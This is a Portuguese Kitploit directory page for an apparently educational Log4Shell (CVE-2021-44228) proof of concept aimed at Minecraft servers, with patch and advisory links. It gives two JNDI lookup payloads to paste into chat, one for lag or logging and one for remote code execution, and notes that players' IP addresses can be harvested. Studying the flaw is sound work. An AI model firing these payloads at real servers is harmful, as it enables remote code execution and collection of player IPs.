Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Log4j-PoC — Uma Prova de Conceito educacional para a Vulnerabilidade Log4j (CVE-2021-44228) no Minecraft | Kitploit
Ferramentas/GitHubGitHub/sma-das/log4j-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubsma-das/log4j-poc

Log4j-PoC

Uma Prova de Conceito educacional para a Vulnerabilidade Log4j (CVE-2021-44228) no Minecraft

Ver Repositório
3há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Prova de Conceito para Log4j (CVE-2021-44228)

Aviso Legal

Este projeto é apenas para fins educacionais.


Introdução

Esta é uma prova de conceito do RCE do log4j adaptada de HyCraftHD.

Aqui estão alguns links para o CVE-2021-44228:

  • https://www.lunasec.io/docs/blog/log4j-zero-day
  • https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.youtube.com/watch?v=JPGola6BamU

Este bug afeta quase todas as versões do log4j2 e talvez do log4j1. A versão recomendada a ser usada é 2.15.0 que corrige a exploração.

Demonstração com Minecraft (que usa log4j2)

  • Detalhes do impacto no Minecraft estão listados aqui: https://twitter.com/slicedlime/status/1469150993527017483
  • Artigo do Minecraft está aqui: https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
  • Versões corrigidas do Minecraft Forge: https://twitter.com/gigaherz/status/1469331288368861195
  • Artigo detalhado do Minecraft Forge: https://gist.github.com/TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6
  • Versões corrigidas do Minecraft Fabric: https://twitter.com/slicedlime/status/1469192689904193537
  • Versões corrigidas do Minecraft Paper: https://twitter.com/aurora_smiles_/status/1469205803232026625
  • Versões corrigidas do Minecraft Spigot: https://www.spigotmc.org/threads/spigot-security-releases-%E2%80%94-1-8-8%E2%80%931-18.537204/
  • Versões corrigidas do Minecraft Sponge: https://discord.com/channels/142425412096491520/303772747907989504/918744598065586196

Lag ou envio de dados serializados

  • Cole ${jndi:ldap://127.0.0.1/e} no chat. Se houver um socket aberto na porta 389, o logj4 tenta conectar e bloqueia a comunicação até que ocorra um timeout.
  • Ao usar esta exploração de prova de conceito, o log no console registrará THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! que é um objeto string serializado do servidor ldap.

image

  • Além disso, o servidor ldap malicioso recebe todos os endereços IP onde a mensagem é registrada. Isso significa que endereços IP de jogadores em um servidor podem ser coletados com esta exploração.

RCE

  • Cole ${jndi:ldap://127.0.0.1/exe} no chat. Se -Dcom.sun.jndi.ldap.object.trustURLCodebase=true estiver definido como true, a execução remota de código ocorrerá.

image

  • Felizmente, jdks modernos desabilitam o carregamento remoto de classes por padrão. (https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
  • Versões antigas ainda podem permitir isso!!
Baixar ferramenta